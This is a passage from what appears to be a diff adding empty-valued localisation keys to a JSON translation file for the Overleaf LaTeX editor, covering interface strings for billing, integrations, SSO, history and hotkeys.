"archived": "", + "archived_projects": "", + "archiving_projects_wont_affect_collaborators": "", + "are_you_affiliated_with_an_institution": "", + "are_you_getting_an_undefined_control_sequence_error": "", + "are_you_still_at": "", + "are_you_sure_you_want_to_cancel_add_on": "", + "as_email": "", + "ask_proj_owner_to_unlink_from_current_github": "", + "ask_proj_owner_to_upgrade_for_full_history": "", + "ask_proj_owner_to_upgrade_for_references_search": "", + "ask_repo_owner_to_reconnect": "", + "ask_repo_owner_to_renew_overleaf_subscription": "", + "at_most_x_libraries_can_be_selected": "", + "auto_close_brackets": "", + "auto_compile": "", + "auto_complete": "", + "autocompile": "", + "autocompile_disabled": "", + "autocompile_disabled_reason": "", + "autocomplete": "", + "autocomplete_references": "", + "automatically_insert_closing_brackets_and_parentheses": "", + "automatically_recompile_the_project_as_you_edit": "", + "available_with_group_professional": "", + "back": "", + "back_to_configuration": "", + "back_to_editor": "", + "back_to_subscription": "", + "back_to_your_projects": "", + "basic_compile_time": "", + "become_an_advisor": "", + "before_you_use_error_assistant": "", + "beta_program_already_participating": "", + "beta_program_benefits": "", + "beta_program_not_participating": "", + "billed_annually_at": "", + "billed_monthly_at": "", + "billed_yearly": "", + "billing": "", + "binary_history_error": "", + "blank_project": "", + "blocked_filename": "", + "blog": "", + "bold": "", + "browser": "", + "bullet_list": "", + "buy_licenses": "", + "buy_more_licenses": "", + "by_subscribing_you_agree_to_our_terms_of_service": "", + "can_edit_content": "", + "can_link_institution_email_acct_to_institution_acct": "", + "can_link_your_institution_acct_2": "", + "can_now_relink_dropbox": "", + "can_view_content": "", + "cancel": "", + "cancel_add_on": "", + "cancel_anytime": "", + "cancel_my_account": "", + "cancel_my_subscription": "", + "cancel_personal_subscription_first": "", + "cancel_subscription": "", + "cancel_your_subscription": "", + "cannot_invite_non_user": "", + "cannot_invite_self": "", + "cannot_verify_user_not_robot": "", + "cant_see_what_youre_looking_for_question": "", + "caption_above": "", + "caption_below": "", + "card_details": "", + "card_details_are_not_valid": "", + "card_must_be_authenticated_by_3dsecure": "", + "card_payment": "", + "careers": "", + "category_arrows": "", + "category_greek": "", + "category_misc": "", + "category_operators": "", + "category_relations": "", + "center": "", + "change": "", + "change_currency": "", + "change_language": "", + "change_or_cancel-cancel": "", + "change_or_cancel-change": "", + "change_or_cancel-or": "", + "change_owner": "", + "change_password": "", + "change_password_in_account_settings": "", + "change_plan": "", + "change_primary_email": "", + "change_primary_email_address_instructions": "", + "change_project_owner": "", + "change_the_ownership_of_your_personal_projects": "", + "change_to_group_plan": "", + "change_to_this_plan": "", + "changing_the_position_of_your_figure": "", + "changing_the_position_of_your_table": "", + "chat": "", + "chat_error": "", + "check_logs": "", + "checking_dropbox_status": "", + "checking_project_github_status": "", + "choose_a_custom_color": "", + "choose_from_group_members": "", + "choose_how_you_search_your_references": "", + "choose_which_experiments": "", + "citation": "", + "clear_cached_files": "", + "clear_search": "", + "click_here_to_view_sl_in_lng": "", + 
"click_to_give_feedback": "", + "click_to_unpause": "", + "clicking_delete_will_remove_sso_config_and_clear_saml_data": "", + "clone_with_git": "", + "close": "", + "clsi_maintenance": "", + "clsi_unavailable": "", + "code_check_failed": "", + "code_check_failed_explanation": "", + "code_editor": "", + "collaborate_online_and_offline": "", + "collaborator_chat": "", + "collabs_per_proj": "", + "collabs_per_proj_single": "", + "collapse": "", + "column_width": "", + "column_width_is_custom_click_to_resize": "", + "column_width_is_x_click_to_resize": "", + "comment": "", + "comment_only": "", + "comment_only_upgrade_for_track_changes": "", + "comment_only_upgrade_to_enable_track_changes": "", + "common": "", + "common_causes_of_compile_timeouts_include": "", + "commons_plan_tooltip": "", + "compact": "", + "company_name": "", + "compare": "", + "compare_all_plans": "", + "comparing_from_x_to_y": "", + "compile_error_entry_description": "", + "compile_error_handling": "", + "compile_larger_projects": "", + "compile_mode": "", + "compile_terminated_by_user": "", + "compiler": "", + "compiling": "", + "compliance": "", + "compromised_password": "", + "configure_sso": "", + "confirm": "", + "confirm_accept_selected_changes": "", + "confirm_accept_selected_changes_plural": "", + "confirm_affiliation": "", + "confirm_affiliation_to_relink_dropbox": "", + "confirm_delete_user_type_email_address": "", + "confirm_new_password": "", + "confirm_primary_email_change": "", + "confirm_reject_selected_changes": "", + "confirm_reject_selected_changes_plural": "", + "confirm_remove_sso_config_enter_email": "", + "confirm_secondary_email": "", + "confirm_your_email": "", + "confirming": "", + "conflicting_paths_found": "", + "congratulations_youve_successfully_join_group": "", + "connect_overleaf_with_github": "", + "connected_users": "", + "connection_lost_with_unsaved_changes": "", + "contact_group_admin": "", + "contact_sales": "", + "contact_support_to_change_group_subscription": "", + "contact_us": "", + "contacting_the_sales_team": "", + "continue": "", + "continue_github_merge": "", + "continue_to": "", + "continue_using_free_features": "", + "continue_with_free_plan": "", + "copied": "", + "copy": "", + "copy_code": "", + "copy_project": "", + "copy_response": "", + "copying": "", + "cost_summary": "", + "country": "", + "country_flag": "", + "coupon_code": "", + "coupon_code_is_not_valid_for_selected_plan": "", + "coupons_not_included": "", + "create": "", + "create_a_new_project": "", + "create_new_subscription": "", + "create_new_tag": "", + "create_project_in_github": "", + "created": "", + "created_at": "", + "cross_reference": "", + "current_file": "", + "current_password": "", + "currently_seeing_only_24_hrs_history": "", + "currently_signed_in_as_x": "", + "currently_subscribed_to_plan": "", + "custom": "", + "custom_borders": "", + "customize_your_group_subscription": "", + "customizing_figures": "", + "customizing_tables": "", + "date_and_owner": "", + "dealing_with_errors": "", + "decrease_indent": "", + "delete": "", + "delete_account": "", + "delete_account_confirmation_label": "", + "delete_account_warning_message_3": "", + "delete_acct_no_existing_pw": "", + "delete_and_leave": "", + "delete_and_leave_projects": "", + "delete_authentication_token": "", + "delete_authentication_token_info": "", + "delete_certificate": "", + "delete_comment": "", + "delete_comment_error_message": "", + "delete_comment_error_title": "", + "delete_comment_message": "", + "delete_comment_thread": "", + 
"delete_comment_thread_message": "", + "delete_figure": "", + "delete_projects": "", + "delete_row_or_column": "", + "delete_sso_config": "", + "delete_table": "", + "delete_tag": "", + "delete_token": "", + "delete_user": "", + "delete_your_account": "", + "deleted_at": "", + "deleted_by_email": "", + "deleted_by_id": "", + "deleted_by_ip": "", + "deleted_by_on": "", + "deleting": "", + "demonstrating_git_integration": "", + "demonstrating_track_changes_feature": "", + "department": "", + "description": "", + "details_provided_by_google_explanation": "", + "dictionary": "", + "did_you_know_institution_providing_professional": "", + "disable": "", + "disable_ai_features": "", + "disable_equation_preview": "", + "disable_equation_preview_confirm": "", + "disable_equation_preview_enable": "", + "disable_single_sign_on": "", + "disable_sso": "", + "disable_stop_on_first_error": "", + "disabled": "", + "disabling": "", + "disconnected": "", + "discount": "", + "discount_of": "", + "discover_the_fastest_way_to_search_and_cite": "", + "dismiss_error_popup": "", + "display": "", + "display_deleted_user": "", + "display_math": "", + "do_you_need_edit_access": "", + "do_you_want_to_change_your_primary_email_address_to": "", + "do_you_want_to_overwrite_it": "", + "do_you_want_to_overwrite_it_plural": "", + "do_you_want_to_overwrite_them": "", + "document_too_long": "", + "document_too_long_detail": "", + "document_too_long_tracked_deletes": "", + "document_updated_externally": "", + "document_updated_externally_detail": "", + "documentation": "", + "doesnt_match": "", + "doing_this_allow_log_in_through_institution": "", + "doing_this_allow_log_in_through_institution_2": "", + "doing_this_will_verify_affiliation_and_allow_log_in_2": "", + "done": "", + "dont_forget_you_currently_have": "", + "dont_reload_or_close_this_tab": "", + "download": "", + "download_all": "", + "download_as_pdf": "", + "download_as_source_zip": "", + "download_metadata": "", + "download_pdf": "", + "download_zip_file": "", + "draft_sso_configuration": "", + "drag_here": "", + "drag_here_paste_an_image_or": "", + "dropbox": "", + "dropbox_checking_sync_status": "", + "dropbox_duplicate_project_names": "", + "dropbox_duplicate_project_names_suggestion": "", + "dropbox_for_link_share_projs": "", + "dropbox_integration_lowercase": "", + "dropbox_sync": "", + "dropbox_sync_both": "", + "dropbox_sync_description": "", + "dropbox_sync_error": "", + "dropbox_sync_in": "", + "dropbox_sync_now_rate_limited": "", + "dropbox_sync_now_running": "", + "dropbox_sync_out": "", + "dropbox_sync_troubleshoot": "", + "dropbox_synced": "", + "dropbox_unlinked_premium_feature": "", + "due_date": "", + "due_today": "", + "duplicate_file": "", + "duplicate_projects": "", + "each_user_will_have_access_to": "", + "easily_manage_your_project_files_everywhere": "", + "edit": "", + "edit_comment_error_message": "", + "edit_comment_error_title": "", + "edit_dictionary": "", + "edit_dictionary_empty": "", + "edit_dictionary_remove": "", + "edit_figure": "", + "edit_sso_configuration": "", + "edit_tag": "", + "edit_your_custom_dictionary": "", + "editing": "", + "editing_captions": "", + "editing_tools": "", + "editor": "", + "editor_and_pdf": "", + "editor_disconected_click_to_reconnect": "", + "editor_font_family": "", + "editor_font_size": "", + "editor_limit_exceeded_in_this_project": "", + "editor_line_height": "", + "editor_only": "", + "editor_only_hide_pdf": "", + "editor_theme": "", + "edits_become_suggestions": "", + "educational_disclaimer": "", 
+ "educational_disclaimer_heading": "", + "educational_percent_discount_applied": "", + "email": "", + "email_address": "", + "email_address_is_invalid": "", + "email_already_registered": "", + "email_confirmed_onboarding": "", + "email_confirmed_onboarding_message": "", + "email_limit_reached": "", + "email_link_expired": "", + "email_must_be_linked_to_institution": "", + "email_or_password_wrong_try_again": "", + "email_remove_by_date": "", + "emails_and_affiliations_explanation": "", + "emails_and_affiliations_title": "", + "empty": "", + "enable_ai_features": "", + "enable_managed_users": "", + "enable_single_sign_on": "", + "enable_sso": "", + "enable_stop_on_first_error_under_recompile_dropdown_menu": "", + "enable_stop_on_first_error_under_recompile_dropdown_menu_v2": "", + "enabled": "", + "enables_real_time_syntax_checking_in_the_editor": "", + "enabling": "", + "end_of_document": "", + "ensure_recover_account": "", + "enter_6_digit_code": "", + "enter_any_size_including_units_or_valid_latex_command": "", + "enter_image_url": "", + "enter_the_code": "", + "enter_the_confirmation_code": "", + "enter_the_number_of_licenses_youd_like_to_add_to_see_the_cost_breakdown": "", + "equation_generator": "", + "equation_preview": "", + "error": "", + "error_assist": "", + "error_log": "", + "error_opening_document": "", + "error_opening_document_detail": "", + "error_performing_request": "", + "error_processing_file": "", + "example_project": "", + "existing_plan_active_until_term_end": "", + "expand": "", + "experiment_full": "", + "expired": "", + "expired_confirmation_code": "", + "expires": "", + "expires_in_days": "", + "expires_on": "", + "export_csv": "", + "export_project_to_github": "", + "failed_to_send_group_invite_to_email": "", + "failed_to_send_managed_user_invite_to_email": "", + "failed_to_send_sso_link_invite_to_email": "", + "fair_usage_policy_applies": "", + "fast": "", + "fast_draft": "", + "features_like_track_changes": "", + "figure": "", + "file": "", + "file_action_created": "", + "file_action_deleted": "", + "file_action_edited": "", + "file_action_renamed": "", + "file_action_restored": "", + "file_action_restored_project": "", + "file_already_exists": "", + "file_already_exists_in_this_location": "", + "file_name": "", + "file_name_figure_modal": "", + "file_name_in_this_project": "", + "file_name_in_this_project_figure_modal": "", + "file_or_folder_name_already_exists": "", + "file_outline": "", + "file_size": "", + "file_tree": "", + "files_cannot_include_invalid_characters": "", + "files_selected": "", + "filter_projects": "", + "find": "", + "find_out_more": "", + "find_out_more_about_institution_login": "", + "find_out_more_about_the_file_outline": "", + "find_out_more_nt": "", + "finding_a_fix": "", + "first_name": "", + "fit_to_height": "", + "fit_to_width": "", + "fixed_width": "", + "fixed_width_wrap_text": "", + "fold_line": "", + "folder_location": "", + "following_paths_conflict": "", + "font_family": "", + "font_size": "", + "footer_about_us": "", + "footer_contact_us": "", + "footer_navigation": "", + "for_enterprise": "", + "for_government": "", + "for_individuals_and_groups": "", + "for_more_information_see_managed_accounts_section": "", + "for_students": "", + "for_universities": "", + "format": "", + "found_matching_deleted_users": "", + "free": "", + "free_7_day_trial_billed_annually": "", + "free_7_day_trial_billed_monthly": "", + "free_plan_label": "", + "free_plan_tooltip": "", + "from_another_project": "", + "from_enforcement_date": "", + 
"from_external_url": "", + "from_filename": "", + "from_github": "", + "from_project_files": "", + "from_provider": "", + "from_url": "", + "full_doc_history": "", + "full_width": "", + "future_payments": "", + "generate_from_text_or_image": "", + "generate_token": "", + "generic_if_problem_continues_contact_us": "", + "generic_linked_file_compile_error": "", + "generic_something_went_wrong": "", + "get_collaborative_benefits": "", + "get_discounted_plan": "", + "get_error_assist": "", + "get_exclusive_access_to_labs": "", + "get_in_touch": "", + "get_most_subscription_discover_premium_features": "", + "get_real_time_track_changes": "", + "git": "", + "git_authentication_token": "", + "git_authentication_token_create_modal_info_1": "", + "git_authentication_token_create_modal_info_2": "", + "git_bridge_modal_click_generate": "", + "git_bridge_modal_enter_authentication_token": "", + "git_bridge_modal_git_clone_your_project": "", + "git_bridge_modal_learn_more_about_authentication_tokens": "", + "git_bridge_modal_read_only": "", + "git_bridge_modal_review_access": "", + "git_bridge_modal_see_once": "", + "git_bridge_modal_use_previous_token": "", + "git_integration": "", + "git_integration_info": "", + "github": "", + "github_commit_message_placeholder": "", + "github_credentials_expired": "", + "github_empty_repository_error": "", + "github_file_name_error": "", + "github_file_sync_error": "", + "github_git_folder_error": "", + "github_integration_lowercase": "", + "github_is_no_longer_connected": "", + "github_is_premium": "", + "github_large_files_error": "", + "github_merge_failed": "", + "github_no_master_branch_error": "", + "github_private_description": "", + "github_public_description": "", + "github_repository_diverged": "", + "github_symlink_error": "", + "github_sync": "", + "github_sync_description": "", + "github_sync_error": "", + "github_sync_repository_not_found_description": "", + "github_timeout_error": "", + "github_too_many_files_error": "", + "github_validation_check": "", + "github_workflow_authorize": "", + "github_workflow_files_delete_github_repo": "", + "github_workflow_files_error": "", + "give_feedback": "", + "give_your_feedback": "", + "go_next_page": "", + "go_page": "", + "go_prev_page": "", + "go_to_code_location_in_pdf": "", + "go_to_overleaf": "", + "go_to_pdf_location_in_code": "", + "go_to_settings": "", + "go_to_subscriptions": "", + "go_to_writefull": "", + "good_news_you_already_purchased_this_add_on": "", + "good_news_you_are_already_receiving_this_add_on_via_writefull": "", + "group_admin": "", + "group_invitations": "", + "group_invite_has_been_sent_to_email": "", + "group_libraries": "", + "group_managed_by_group_administrator": "", + "group_management": "", + "group_managers": "", + "group_members": "", + "group_plan_tooltip": "", + "group_plan_upgrade_description": "", + "group_plan_with_name_tooltip": "", + "group_settings": "", + "group_sso_configuration_idp_metadata": "", + "group_sso_configure_service_provider_in_idp": "", + "group_sso_documentation_links": "", + "group_subscription": "", + "have_an_extra_backup": "", + "have_more_days_to_try": "", + "headers": "", + "help": "", + "help_articles_matching": "", + "help_improve_overleaf_fill_out_this_survey": "", + "help_improve_screen_reader_fill_out_this_survey": "", + "help_shape_the_future_of_overleaf": "", + "hide": "", + "hide_configuration": "", + "hide_deleted_user": "", + "hide_document_preamble": "", + "hide_file_tree": "", + "hide_local_file_contents": "", + "hide_outline": "", + 
"history": "", + "history_add_label": "", + "history_are_you_sure_delete_label": "", + "history_compare_from_this_version": "", + "history_compare_up_to_this_version": "", + "history_delete_label": "", + "history_download_this_version": "", + "history_entry_origin_dropbox": "", + "history_entry_origin_git": "", + "history_entry_origin_github": "", + "history_entry_origin_upload": "", + "history_label_created_by": "", + "history_label_project_current_state": "", + "history_label_this_version": "", + "history_new_label_name": "", + "history_restore_promo_content": "", + "history_restore_promo_title": "", + "history_resync": "", + "history_view_a11y_description": "", + "history_view_all": "", + "history_view_labels": "", + "home": "", + "hotkey_add_a_comment": "", + "hotkey_autocomplete_menu": "", + "hotkey_beginning_of_document": "", + "hotkey_bold_text": "", + "hotkey_compile": "", + "hotkey_delete_current_line": "", + "hotkey_end_of_document": "", + "hotkey_find_and_replace": "", + "hotkey_go_to_line": "", + "hotkey_indent_selection": "", + "hotkey_insert_candidate": "", + "hotkey_italic_text": "", + "hotkey_redo": "", + "hotkey_search_references": "", + "hotkey_select_all": "", + "hotkey_select_candidate": "", + "hotkey_to_lowercase": "", + "hotkey_to_uppercase": "", + "hotkey_toggle_comment": "", + "hotkey_toggle_review_panel": "", + "hotkey_toggle_track_changes": "", + "hotkey_undo": "", + "hotkeys": "", + "how_it_works": "", + "how_many_licenses_do_you_want_to_buy": "", + "how_to_create_tables": "", + "how_to_insert_images": "", + "how_we_use_your_data": "", + "how_we_use_your_data_explanation": "", + "i_confirm_am_student": "", + "i_want_to_stay": "", + "id": "", + "identify_errors_with_your_compile": "", + "if_you_need_to_customize_your_table_further_you_can": "", + "if_you_want_more_than_x_licenses_on_your_plan_we_need_to_add_them_for_you": "", + "if_you_want_to_reduce_the_number_of_licenses_please_contact_support": "", + "if_your_occupation_not_listed_type_full_name": "", + "ignore_validation_errors": "", + "ill_take_it": "", + "image_file": "", + "image_url": "", + "image_width": "", + "import_a_bibtex_file_from_your_provider_account": "", + "import_existing_projects_from_github": "", + "import_from_github": "", + "import_idp_metadata": "", + "import_to_sharelatex": "", + "imported_from_another_project_at_date": "", + "imported_from_external_provider_at_date": "", + "imported_from_mendeley_at_date": "", + "imported_from_papers_at_date": "", + "imported_from_the_output_of_another_project_at_date": "", + "imported_from_zotero_at_date": "", + "importing": "", + "importing_and_merging_changes_in_github": "", + "improved_dark_mode": "", + "in_order_to_match_institutional_metadata_2": "", + "in_order_to_match_institutional_metadata_associated": "", + "include_caption": "", + "include_label": "", + "include_results_from_your_reference_manager": "", + "include_results_from_your_x_account": "", + "include_the_error_message_and_ai_response": "", + "included_as_part_of_your_writefull_subscription": "", + "increase_indent": "", + "increased_compile_timeout": "", + "inline": "", + "inline_math": "", + "inr_discount_modal_info": "", + "inr_discount_modal_title": "", + "insert": "", + "insert_column_left": "", + "insert_column_right": "", + "insert_figure": "", + "insert_from_another_project": "", + "insert_from_project_files": "", + "insert_from_url": "", + "insert_image": "", + "insert_row_above": "", + "insert_row_below": "", + "insert_x_columns_left": "", + "insert_x_columns_right": "", + 
"insert_x_rows_above": "", + "insert_x_rows_below": "", + "institution": "", + "institution_account": "", + "institution_acct_successfully_linked_2": "", + "institution_and_role": "", + "institution_has_overleaf_subscription": "", + "institution_templates": "", + "institutional_leavers_survey_notification": "", + "integrate_overleaf_with_dropbox": "", + "integrations": "", + "integrations_like_github": "", + "interested_in_cheaper_personal_plan": "", + "invalid_confirmation_code": "", + "invalid_email": "", + "invalid_file_name": "", + "invalid_filename": "", + "invalid_password_contains_email": "", + "invalid_password_too_similar": "", + "invalid_regular_expression": "", + "invalid_request": "", + "invite": "", + "invite_expired": "", + "invite_more_collabs": "", + "invite_more_members": "", + "invite_not_accepted": "", + "invite_resend_limit_hit": "", + "invited_to_group": "", + "invited_to_group_have_individual_subcription": "", + "inviting": "", + "ip_address": "", + "is_email_affiliated": "", + "issued_on": "", + "it_looks_like_that_didnt_work_you_can_try_again_or_get_in_touch": "", + "it_looks_like_your_account_is_billed_manually": "", + "it_looks_like_your_payment_details_are_missing_please_update_your_billing_information": "", + "italics": "", + "join_beta_program": "", + "join_now": "", + "join_overleaf_labs": "", + "join_project": "", + "join_team_explanation": "", + "joined_team": "", + "joining": "", + "justify": "", + "kb_suggestions_enquiry": "", + "keep_current_plan": "", + "keep_personal_projects_separate": "", + "keep_your_account_safe_add_another_email": "", + "keybindings": "", + "keyboard_shortcuts": "", + "knowledge_base": "", + "labels_help_you_to_easily_reference_your_figures": "", + "labels_help_you_to_reference_your_tables": "", + "labs": "", + "language": "", + "language_suggestions": "", + "large_or_high-resolution_images_taking_too_long": "", + "large_or_high_resolution_images_taking_too_long_to_process": "", + "last_active": "", + "last_active_description": "", + "last_edit": "", + "last_logged_in": "", + "last_modified": "", + "last_name": "", + "last_resort_trouble_shooting_guide": "", + "last_suggested_fix": "", + "last_updated_date_by_x": "", + "last_used": "", + "latam_discount_modal_info": "", + "latam_discount_modal_title": "", + "latex_in_thirty_minutes": "", + "latex_places_figures_according_to_a_special_algorithm": "", + "latex_places_tables_according_to_a_special_algorithm": "", + "layout": "", + "layout_options": "", + "layout_processing": "", + "learn_more": "", + "learn_more_about_account": "", + "learn_more_about_compile_timeouts": "", + "learn_more_about_link_sharing": "", + "learn_more_about_managed_users": "", + "learn_more_about_other_causes_of_compile_timeouts": "", + "leave": "", + "leave_any_group_subscriptions": "", + "leave_group": "", + "leave_now": "", + "leave_project": "", + "leave_projects": "", + "left": "", + "length_unit": "", + "let_us_know": "", + "let_us_know_how_we_can_help": "", + "let_us_know_what_you_think": "", + "lets_get_those_premium_features": "", + "library": "", + "licenses": "", + "limited_document_history": "", + "limited_offer": "", + "limited_to_n_collaborators_per_project": "", + "limited_to_n_collaborators_per_project_plural": "", + "limited_to_n_editors": "", + "limited_to_n_editors_per_project": "", + "limited_to_n_editors_per_project_plural": "", + "limited_to_n_editors_plural": "", + "line": "", + "line_height": "", + "line_width_is_the_width_of_the_line_in_the_current_environment": "", + "link": "", + 
"link_account": "", + "link_accounts": "", + "link_accounts_and_add_email": "", + "link_institutional_email_get_started": "", + "link_overleaf_with_git": "", + "link_sharing": "", + "link_sharing_is_off_short": "", + "link_sharing_is_on": "", + "link_to_github": "", + "link_to_github_description": "", + "link_to_mendeley": "", + "link_to_papers": "", + "link_to_zotero": "", + "linked_accounts": "", + "linked_accounts_explained": "", + "linked_collabratec_description": "", + "linked_file": "", + "loading": "", + "loading_github_repositories": "", + "loading_prices": "", + "loading_recent_github_commits": "", + "loading_writefull": "", + "log_entry_description": "", + "log_entry_maximum_entries": "", + "log_entry_maximum_entries_enable_stop_on_first_error": "", + "log_entry_maximum_entries_see_full_logs": "", + "log_entry_maximum_entries_title": "", + "log_hint_extra_info": "", + "log_in": "", + "log_in_with_primary_email_address": "", + "log_out": "", + "log_out_lowercase_dot": "", + "log_viewer_error": "", + "logging_in_or_managing_your_account": "", + "login_count": "", + "login_to_accept_invitation": "", + "login_with_service": "", + "logs_and_output_files": "", + "looking_multiple_licenses": "", + "looks_like_youre_at": "", + "lost_connection": "", + "main_bibliography_file_for_this_project": "", + "main_document": "", + "main_file_not_found": "", + "main_navigation": "", + "make_a_copy": "", + "make_email_primary_description": "", + "make_owner": "", + "make_primary": "", + "make_private": "", + "manage_beta_program_membership": "", + "manage_files_from_your_dropbox_folder": "", + "manage_group_members_subtext": "", + "manage_group_settings": "", + "manage_group_settings_subtext": "", + "manage_group_settings_subtext_group_sso": "", + "manage_group_settings_subtext_managed_users": "", + "manage_institution_managers": "", + "manage_managers_subtext": "", + "manage_newsletter": "", + "manage_publisher_managers": "", + "manage_sessions": "", + "manage_subscription": "", + "manage_your_ai_assist_add_on": "", + "managed": "", + "managed_user_accounts": "", + "managed_user_invite_has_been_sent_to_email": "", + "managed_users": "", + "managed_users_explanation": "", + "managed_users_is_enabled": "", + "managed_users_terms": "", + "managers_management": "", + "managing_your_subscription": "", + "marked_as_resolved": "", + "math": "", + "math_display": "", + "math_inline": "", + "maximum_files_uploaded_together": "", + "maybe_later": "", + "members_management": "", + "mendeley_dynamic_sync_description": "", + "mendeley_groups_loading_error": "", + "mendeley_groups_relink": "", + "mendeley_integration": "", + "mendeley_is_premium": "", + "mendeley_reference_loading_error": "", + "mendeley_reference_loading_error_expired": "", + "mendeley_reference_loading_error_forbidden": "", + "mendeley_sync_description": "", + "mendeley_upgrade_prompt_content": "", + "mendeley_upgrade_prompt_title": "", + "menu": "", + "merge_cells": "", + "message_received": "", + "missing_field_for_entry": "", + "missing_fields_for_entry": "", + "missing_payment_details": "", + "money_back_guarantee": "", + "month": "", + "month_plural": "", + "more": "", + "more_actions": "", + "more_changes_based_on_your_feedback": "", + "more_collabs_per_project": "", + "more_comments": "", + "more_compile_time": "", + "more_info": "", + "more_options": "", + "more_options_for_border_settings_coming_soon": "", + "my_library": "", + "n_items": "", + "n_items_plural": "", + "n_more_updates_above": "", + "n_more_updates_above_plural": "", + 
"n_more_updates_below": "", + "n_more_updates_below_plural": "", + "name": "", + "name_usage_explanation": "", + "navigate_log_source": "", + "navigation": "", + "need_anything_contact_us_at": "", + "need_contact_group_admin_to_make_changes": "", + "need_make_changes": "", + "need_more_than_x_licenses": "", + "need_to_add_new_primary_before_remove": "", + "need_to_leave": "", + "new_compile_domain_notice": "", + "new_file": "", + "new_folder": "", + "new_font_open_dyslexic": "", + "new_look_and_feel": "", + "new_look_and_placement_of_the_settings": "", + "new_name": "", + "new_navigation_introducing_left_hand_side_rail_and_top_menus": "", + "new_overleaf_editor": "", + "new_password": "", + "new_project": "", + "new_subscription_will_be_billed_immediately": "", + "new_tag": "", + "new_tag_name": "", + "newsletter": "", + "newsletter_onboarding_accept": "", + "next": "", + "next_page": "", + "next_payment_of_x_collectected_on_y": "", + "no_actions": "", + "no_borders": "", + "no_caption": "", + "no_comments_or_suggestions": "", + "no_existing_password": "", + "no_folder": "", + "no_image_files_found": "", + "no_libraries_selected": "", + "no_members": "", + "no_messages": "", + "no_messages_yet": "", + "no_new_commits_in_github": "", + "no_one_has_commented_or_left_any_suggestions_yet": "", + "no_other_projects_found": "", + "no_pdf_error_explanation": "", + "no_pdf_error_reason_no_content": "", + "no_pdf_error_reason_output_pdf_already_exists": "", + "no_pdf_error_reason_unrecoverable_error": "", + "no_pdf_error_title": "", + "no_preview_available": "", + "no_projects": "", + "no_resolved_comments": "", + "no_search_results": "", + "no_selection_select_file": "", + "no_symbols_found": "", + "no_thanks_cancel_now": "", + "normal": "", + "normally_x_price_per_month": "", + "normally_x_price_per_year": "", + "not_a_student": "", + "not_managed": "", + "not_now": "", + "notification_personal_and_group_subscriptions": "", + "notification_project_invite_accepted_message": "", + "notification_project_invite_message": "", + "number_of_users": "", + "numbered_list": "", + "oauth_orcid_description": "", + "of": "", + "off": "", + "official": "", + "ok": "", + "ok_continue_to_project": "", + "ok_join_project": "", + "on": "", + "on_free_plan_upgrade_to_access_features": "", + "one_step_away_from_professional_features": "", + "only_group_admin_or_managers_can_delete_your_account_1": "", + "only_group_admin_or_managers_can_delete_your_account_2": "", + "only_group_admin_or_managers_can_delete_your_account_3": "", + "only_group_admin_or_managers_can_delete_your_account_4": "", + "only_group_admin_or_managers_can_delete_your_account_5": "", + "only_importer_can_refresh": "", + "open_action_menu": "", + "open_advanced_reference_search": "", + "open_file": "", + "open_link": "", + "open_path": "", + "open_pdf_in_separate_tab": "", + "open_project": "", + "open_target": "", + "optional": "", + "or": "", + "organization_name": "", + "organize_projects": "", + "organize_tags": "", + "other": "", + "other_causes_of_compile_timeouts": "", + "other_logs_and_files": "", + "other_output_files": "", + "our_team_will_get_back_to_you_shortly": "", + "our_values": "", + "out_of_sync": "", + "out_of_sync_detail": "", + "output_file": "", + "overall_theme": "", + "overleaf": "", + "overleaf_history_system": "", + "overleaf_labs": "", + "overleaf_logo": "", + "overview": "", + "overwrite": "", + "overwriting_the_original_folder": "", + "owned_by_x": "", + "owner": "", + "page_current": "", + "pagination_navigation": "", 
+ "papers_dynamic_sync_description": "", + "papers_groups_loading_error": "", + "papers_groups_relink": "", + "papers_integration": "", + "papers_is_premium": "", + "papers_reference_loading_error": "", + "papers_reference_loading_error_expired": "", + "papers_reference_loading_error_forbidden": "", + "papers_sync_description": "", + "papers_upgrade_prompt_content": "", + "papers_upgrade_prompt_title": "", + "paragraph_styles": "", + "partial_outline_warning": "", + "password": "", + "password_managed_externally": "", + "password_was_detected_on_a_public_list_of_known_compromised_passwords": "", + "paste_options": "", + "paste_with_formatting": "", + "paste_without_formatting": "", + "pause_subscription": "", + "pause_subscription_for": "", + "pay_now": "", + "payment_provider_unreachable_error": "", + "payment_summary": "", + "pdf_compile_in_progress_error": "", + "pdf_compile_rate_limit_hit": "", + "pdf_compile_try_again": "", + "pdf_couldnt_compile": "", + "pdf_in_separate_tab": "", + "pdf_only": "", + "pdf_only_hide_editor": "", + "pdf_preview": "", + "pdf_preview_error": "", + "pdf_rendering_error": "", + "pdf_unavailable_for_download": "", + "pdf_viewer": "", + "pdf_viewer_error": "", + "pending_additional_licenses": "", + "pending_addon_cancellation": "", + "pending_invite": "", + "per_license": "", + "per_month": "", + "percent_is_the_percentage_of_the_line_width": "", + "permanently_disables_the_preview": "", + "personal_library": "", + "pick_up_where_you_left_off": "", + "plan": "", + "plan_tooltip": "", + "please_ask_the_project_owner_to_upgrade_more_collaborators": "", + "please_ask_the_project_owner_to_upgrade_to_track_changes": "", + "please_change_primary_to_remove": "", + "please_check_your_inbox_to_confirm": "", + "please_compile_pdf_before_download": "", + "please_compile_pdf_before_word_count": "", + "please_confirm_primary_email": "", + "please_confirm_secondary_email": "", + "please_confirm_your_email_before_making_it_default": "", + "please_contact_support_to_makes_change_to_your_plan": "", + "please_enter_confirmation_code": "", + "please_get_in_touch": "", + "please_link_before_making_primary": "", + "please_provide_a_message": "", + "please_provide_a_subject": "", + "please_provide_a_valid_email_address": "", + "please_reconfirm_institutional_email": "", + "please_reconfirm_your_affiliation_before_making_this_primary": "", + "please_refresh": "", + "please_select": "", + "please_select_a_file": "", + "please_select_a_project": "", + "please_select_an_output_file": "", + "please_set_main_file": "", + "please_wait": "", + "plus_additional_collaborators_document_history_track_changes_and_more": "", + "plus_more": "", + "plus_x_additional_licenses_for_a_total_of_y_licenses": "", + "postal_code": "", + "premium": "", + "premium_feature": "", + "premium_features": "", + "premium_plan_label": "", + "presentation_mode": "", + "press_and_awards": "", + "previous_page": "", + "price": "", + "primarily_work_study_question": "", + "primarily_work_study_question_company": "", + "primarily_work_study_question_government": "", + "primarily_work_study_question_nonprofit_ngo": "", + "primarily_work_study_question_other": "", + "primarily_work_study_question_university_school": "", + "primary_certificate": "", + "priority_support": "", + "privacy_and_terms": "", + "private": "", + "problem_talking_to_publishing_service": "", + "problem_with_subscription_contact_us": "", + "proceed_to_paypal": "", + "proceeding_to_paypal_takes_you_to_the_paypal_site_to_pay": "", + "processing": "", + 
